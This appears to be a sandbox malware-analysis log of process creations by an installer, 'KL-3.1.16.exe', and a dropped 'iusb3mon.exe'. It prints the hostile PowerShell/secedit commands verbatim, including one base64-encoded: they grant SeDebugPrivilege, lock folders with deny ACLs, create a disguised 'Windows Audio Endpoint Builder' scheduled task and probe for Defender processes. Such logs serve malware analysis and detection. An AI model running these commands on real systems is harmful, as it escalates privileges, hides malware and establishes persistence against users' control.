Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.')) -Force;"
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.')) -Force;"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"5ar6QsR4e.exe\"));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\KL-3.1.16.exe	Process created: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe "C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:5904754 "__IRAFN:C:\Users\user\Desktop\KL-3.1.16.exe" "__IRCT:3" "__IRTSS:0" "__IRSID:S-1-5-21-2246122658-3693405117-2476756634-1003"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"msmpeng.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"securityhealthsystray.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"mpcopyaccelerator.exe\"));	Jump to behavior
